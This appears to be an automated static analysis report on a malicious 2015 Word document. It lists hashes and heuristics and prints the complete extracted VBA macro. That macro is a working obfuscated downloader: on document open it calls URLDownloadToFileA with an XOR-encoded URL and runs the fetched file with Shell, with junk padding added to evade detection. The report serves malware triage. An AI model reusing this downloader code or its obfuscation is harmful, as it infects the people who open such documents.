Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10841585f9856262…

MALICIOUS

Office (OLE)

Size: 94.5 KB
Created: 2015-01-20 10:08:00
Authoring application: Microsoft Office Word
First seen: 2015-03-15
MD5: f3c3fbeed637cccc7549636b7e0f7cdb
SHA-1: 51fbe45ef0c612b2f864e97faeaad89701985fcc
SHA-256: 10841585f9856262b8fa5fdeab9ff5ae3adab09a73af00c3fbc772bb96028275
Risk Score: 278

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains VBA macros that trigger on 'autoopen', indicating an attempt to execute malicious code as soon as the document is opened. Critical heuristics flag the use of the URLDownloadToFile API, suggesting the macro's purpose is to download and execute a second-stage payload from a remote source. The obfuscated VBA code and the presence of multiple classes and functions point towards downloader or dropper malware.

Heuristics (9)

  • Reference to URLDownloadToFile API [critical] SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
    OwZLs2 = Shell(x9, 1)
  • URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script:
        "URLDownloadToFileA" (ByVal pCaller As LongPtr, _
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Sub autoopen()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script:
    tiO XorByDataLen("—‹‹ЏЕРР—љ–”љ—ћ““С›љР•ЊРќ–‘Сљ‡љ"), Environ(XorByDataLen("«ІЇ")) & XorByDataLen("Јё·•”›™�Сљ‡љ")
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13000 bytes
SHA-256: 58ce549a7d84ae81c6b6bf1ffd414d64816ee501ee26dcde8e9903e231a370b8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
150 of 228 identifiers look randomly generated (e.g. 'BPaIIvvQfsTorIUJGASPmVhnju') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
N1
End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function UmYcCcn()

End Function
Private Sub TpNGCNftO()

End Sub
Public Sub fHJqKPY()

End Sub
Public Sub CBGdkrVjiyB()

End Sub
Public Sub kdMvxRuzMJsFffG()

End Sub
Public Function QCbsSsDxPzV()

End Function
Public Sub SevJRSdAvZaGNgo()

End Sub
Public Function FDIuAHZzyOE()

End Function
Private Function EjhOD()

End Function
Public Sub SdLLyyajvQr()

End Sub
Private Function YMJDVSqakqmyO()

End Function
Private Function wTBeubh()

End Function
Private Function dZZYdNGNsS()

End Function
Public Function bSrUzjfTofUjtcc()

End Function
Private Function zLaHZ()

End Function

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub DMQRvKdxQKA()

End Sub
Public Sub oteQeIVU()

End Sub
Private Sub jHQPzikE()

End Sub
Private Function JfsgRtPOqY()

End Function
Private Sub FfrlDA()

End Sub
Public Function JFQixSFPniLNtN()

End Function
Private Sub wFGEJhnuZmlBEH()

End Sub
Public Sub gQyAUxCP()

End Sub
Private Sub iiJRfGbFevVw()

End Sub

Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Function lLQQjgCYxplw()

End Function
Public Sub mvSNrtatzH()

End Sub
Private Function mkpMSaE()

End Function
Private Sub lnfETL()

End Sub
Private Function Adivsb()

End Function
Public Function pyKmGlJcBcnhz()

End Function
Public Sub zFBNetAC()

End Sub
Public Sub HJqwP()

End Sub
Public Function oonsdjrHi()

End Function
Private Sub qiGkOMu()

End Sub
Private Function kyIrrefFO()

End Function
Public Function BasEspjByVFPVRe()

End Function
Public Function SczhKaGMgodJEE()

End Function
Public Sub mtYykADGy()

End Sub

Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub eJEFDIuAZzyOEHyYAgeL()

End Sub
Private Sub BPaIIvvQfsTorIUJGASPmVhnju()

End Sub
Private Function ktQxbrexFuaVVTZKDKpPB()

End Function
Private Sub PoRwgcQlbRgqZZL()

End Sub
Private Function IQEVHLlaQ()

End Function
Private Sub DZxDzL()

End Sub
Private Sub AJTNrHauNH()

End Sub
Private Function mlqbTbF()

End Function
Public Function logETM()

End Function

Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function cBcnhziFpzFB()

End Function
Public Function ACLjeHJqw()

End Function
Public Function soonsdjrHihxn()

End Function
Private Sub kOMujDtkyIrr()

End Sub
Public Function ObDQBasEspj()

End Function
Public Sub FPVReuvQSczhKaG()

End Sub
Private Sub dJEEDItm()

End Sub
Public Sub kADGyQAfOK()

End Sub
Public Function BOZHHvhIfrFn()

End Function
Public Sub UIFzRPmHg()

End Sub

Attribute VB_Name = "Class6"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub QQjgD()

End Sub
Public Function zLOdyAJTNrH()

End Function
Public Function HxdmmlqbTbFSR()

End Function
Public Sub gETMwehB()

End Sub
Public Function GcpcOqMKn()

End Function
Public Sub cCcnhzwTpNGCNft()

End Sub
Public Sub kfHJqKPYNtCCB()

End Sub
Public Function rVjiyBEUkdMvxRuz()

End Function
Private Function FffGOcDQ()

End Function
Private Sub SsDxPzVFQ()

End Sub

Attribute VB_Name = "Module1"
Public Function rUkQQqyoTOPN()

End Function
Public Sub EiJuKOQIi()

End Sub
Public Sub VJeUL()

End Sub
Public Sub RFsSpBQxOBFfSQ()

End Sub
Private Function wSrxt()

End Function
Private Function stDMHlAToGBqQfg()

End Function
Private Function NUyLKbfiZyNFqY()

End Function
Private Sub cqAUjVIjFEhNgRV()

End Sub
Private Sub btqMjH()

End Sub
Private Sub YnIwFdYBDkEJ()

End Sub

Attribute VB_Name = "Module2"
Private Function BQxOBFfS()

End Function
Private Function awSrx()

End Function
Public Function QstDMHlAToGB()

End Function
Public Sub gejTNU()

End Sub
Public Function bfiZyNFqYavYqAUjV()

End Function
Private Function EhNgRVvVhbt()

End Function
Public Function HzvHYnI()

End Function
Public Function YBDkE()

End Function
Public Function nvwuzQelPccr()

End Function
Public Function OeQGorLo()

End Function
Private Function mzZZAIUxQwT()

End Function
Public Function xrJtPzK()

End Function
Public Sub pDLMVuoRTAGaiYD()

End Sub
Private Sub CnuBRssHyA()

End Sub
Private Function ZQEtNEvIT()

End Function
Private Function pQZlNhMk()

End Function

Attribute VB_Name = "Module3"
Private Sub OcDQCbsSsDx()

End Sub
Private Sub FQQSevJRSdAvZaG()

End Sub
Private Function eJEFDIuA()

End Function
Private Sub yOEHyYAgeL()

End Sub
Private Function BPaIIvvQfsTo()

End Function
Private Sub UJGASPmVhnju()

End Sub
Public Function ktQxbr()

End Function
Private Sub FuaVVTZKD()

End Sub
Public Sub BQUYPoRwgcQlb()

End Sub

Attribute VB_Name = "Module4"
Private Function frFnEquUIFzR()

End Function
Public Function gmiuxLijsCxb()

End Function
Public Function wqgLU()

End Function
Public Function JCJoBAQTQOoCvgN()

End Function
Private Sub RfpKYLxZvuVDU()

End Sub
Public Sub LQQjgCY()

End Sub
Private Function wNdymvS()

End Function
Public Sub atzHwclmk()

End Sub
Private Sub aERQhlnfETLweg()

End Sub

Attribute VB_Name = "Module5"


Attribute VB_Name = "Module6"
Public Function bfiZyNFqYavY()

End Function
Public Function UjVIjFEhNg()

End Function
Public Sub VhbtqMjHz()

End Sub
Public Function nIwFdYBDkEJRHnv()

End Function
Public Sub QelPccrvyp()

End Sub
Public Sub GorLosGCmzZZAIU()

End Sub
Private Function TmLmxrJtP()

End Function
Private Sub LYpDLMVuoRTAGa()

End Sub
Private Sub yzxCnuBRssH()

End Sub
Public Sub RuZQEtNEv()

End Sub
Public Sub BppQZlNhMkC()

End Sub
Private Function uMJgPbgdoF()

End Function
Private Function mKrUk()

End Function
Private Sub yoTOPNSD()

End Sub
Private Sub JuKOQI()

End Sub

Attribute VB_Name = "Module7"
Public Sub OeQGorLoGCmzZZAIU()

End Sub
Public Sub TmLmxrJtPKPLYpDLMVu()

End Sub
Private Sub AGaiYDyzxCnuBR()

End Sub
Public Sub yAsRuZQEtNEv()

End Sub
Public Function BppQZlNhMkCCAuMJgPbgdoFG()

End Function
Private Sub KrUkQQq()

End Sub
Private Sub OPNSDwEiJuKOQI()

End Sub
Public Function aVJeULak()

End Function
Private Function sSpBQxOBFfS()

End Function
Private Function awSrxEHQstDMHl()

End Function
Public Function GBqQfgej()

End Function
Private Sub yLKbfiZyNFqYav()

End Sub

Attribute VB_Name = "Module8"
Public Sub hxnqiG()

End Sub
Private Function ujDtkyIrrefFO()

End Function
Public Sub BasEspjByVFPVRevQSczhKaG()

End Sub
Private Function dJEEDItmYykADGyQA()

End Function
Private Function zTKBOZHHvhIf()

End Function
Public Function EquUIFz()

End Function
Private Sub HgmiuxL()

End Sub
Private Function CxbqIdwqg()

End Function
Public Function TZJCJoBAQTQOoCv()

End Function
Public Function kMRfpKYLxZvuV()

End Function
Public Sub KlLQQjgCYxpl()

End Sub
Private Function ymvSN()

End Function
Public Sub KPYNtCCB()

End Sub
Private Function rVjiyBE()

End Function

Attribute VB_Name = "Module9"
Public Sub UVTZJCJoBAQTQ()

End Sub
Private Sub vgNPkMRfpKY()

End Sub
Public Sub vuVDUGKlLQQjgCY()

End Sub
Private Sub wNdymvSrtatzHwclmkpM()

End Sub
Private Sub RQhlnfETLwe()

End Sub
Public Sub ivsbo()

End Sub
Public Sub yKmGlJcB()

End Sub
Private Function ziFpzF()

End Function
Private Function tACLje()

End Function

Attribute VB_Name = "Module10"

Attribute VB_Name = "Module11"
#If VBA7 Then
    Private Declare PtrSafe Function GHGijkHKJG Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal pCaller As LongPtr, _
    ByVal sdfsdf As String, _
    ByVal jdfgdfg As String, _
    ByVal tjrtgefsdf As Long, _
    ByVal khlkdfsef As LongPtr) As LongPtr
#Else
    Private Declare Function GHGijkHKJG Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal pCaller As Long, _
    ByVal sdfsdf As String, _
    ByVal jdfgdfg As String, _
    ByVal tjrtgefsdf As Long, _
    ByVal khlkdfsef As Long) As Long
#End If


Sub N1()
tiO XorByDataLen("—‹‹ЏЕРР—љ–”љ—ћ““С›љР•ЊРќ–‘Сљ‡љ"), Environ(XorByDataLen("«ІЇ")) & XorByDataLen("Јё·•”›™�Сљ‡љ")
Dim ZjplxNd As Integer
For ZjplxNd = 0 To 0
If ZjplxNd = 5 Then End
Next ZjplxNd
Dim bpQoaeEsqkC As Integer
For bpQoaeEsqkC = 0 To 0
If bpQoaeEsqkC = 5 Then End
Next bpQoaeEsqkC
End Sub
Function tiO(f243r14Z As String, x9 As String) As Boolean
vJHKBJdfkgfg = GHGijkHKJG(0&, f243r14Z, x9, 0&, 0&)
Dim erSnRqHiITNg As Integer
For erSnRqHiITNg = 0 To 0
If erSnRqHiITNg = 5 Then End
Next erSnRqHiITNg
Dim oocNpLYmT As Integer
For oocNpLYmT = 0 To 0
If oocNpLYmT = 5 Then End
Next oocNpLYmT
Dim OwZLs2
Dim KMhJO As Integer
For KMhJO = 0 To 0
If KMhJO = 5 Then End
Next KMhJO
Dim LYmTlQb As Integer
For LYmTlQb = 0 To 0
If LYmTlQb = 5 Then End
Next LYmTlQb
OwZLs2 = Shell(x9, 1)
Dim OcZHUuuVer As Integer
For OcZHUuuVer = 0 To 0
If OcZHUuuVer = 5 Then End
Next OcZHUuuVer
Dim ocNpLYm As Integer
For ocNpLYm = 0 To 0
If ocNpLYm = 5 Then End
Next ocNpLYm
End Function

Public Function XorByDataLen(sData As String) As String
Dim bData() As Byte
Dim ZvfqvsD As Integer
For ZvfqvsD = 0 To 0
If ZvfqvsD = 5 Then End
Next ZvfqvsD
Dim pKArFPyyl As Integer
For pKArFPyyl = 0 To 0
If pKArFPyyl = 5 Then End
Next pKArFPyyl
Dim i As Integer
Dim QvHHQbeVuJ As Integer
For QvHHQbeVuJ = 0 To 0
If QvHHQbeVuJ = 5 Then End
Next QvHHQbeVuJ
Dim Npaquw As Integer
For Npaquw = 0 To 0
If Npaquw = 5 Then End
Next Npaquw
If Len(sData) <> 0 Then
Dim xnSccaf As Integer
For xnSccaf = 0 To 0
If xnSccaf = 5 Then End
Next xnSccaf
Dim RCxmGxo As Integer
For RCxmGxo = 0 To 0
If RCxmGxo = 5 Then End
Next RCxmGxo
ReDim bData(Len(sData))
Dim NrEDTYbRrG As Integer
For NrEDTYbRrG = 0 To 0
If NrEDTYbRrG = 5 Then End
Next NrEDTYbRrG
Dim bQwrsqvgZgKl As Integer
For bQwrsqvgZgKl = 0 To 0
If bQwrsqvgZgKl = 5 Then End
Next bQwrsqvgZgKl
bData = StrConv(sData, vbFromUnicode)
Dim yYyJDVSp As Integer
For yYyJDVSp = 0 To 0
If yYyJDVSp = 5 Then End
Next yYyJDVSp
Dim dUuQB As Integer
For dUuQB = 0 To 0
If dUuQB = 5 Then End
Next dUuQB
For i = 0 To Len(sData) - 1
Dim NdwPje As Integer
For NdwPje = 0 To 0
If NdwPje = 5 Then End
Next NdwPje
Dim qyzJh As Integer
For qyzJh = 0 To 0
If qyzJh = 5 Then End
Next qyzJh
bData(i) = bData(i) Xor 255
Dim xPMkFekgs As Integer
For xPMkFekgs = 0 To 0
If xPMkFekgs = 5 Then End
Next xPMkFekgs
Dim CmxDzK As Integer
For CmxDzK = 0 To 0
If CmxDzK = 5 Then End
Next CmxDzK
Next i
Dim sfGcpDlCo As Integer
For sfGcpDlCo = 0 To 0
If sfGcpDlCo = 5 Then End
Next sfGcpDlCo
Dim dzjuzwHZ As Integer
For dzjuzwHZ = 0 To 0
If dzjuzwHZ = 5 Then End
Next dzjuzwHZ
XorByDataLen = StrConv(bData, vbUnicode)
Dim pcCZmAhzl As Integer
For pcCZmAhzl = 0 To 0
If pcCZmAhzl = 5 Then End
Next pcCZmAhzl
Dim yNGqY As Integer
For yNGqY = 0 To 0
If yNGqY = 5 Then End
Next yNGqY
End If
Dim TCCpcCZmAh As Integer
For TCCpcCZmAh = 0 To 0
If TCCpcCZmAh = 5 Then End
Next TCCpcCZmAh
Dim vYcqn As Integer
For vYcqn = 0 To 0
If vYcqn = 5 Then End
Next vYcqn
End Function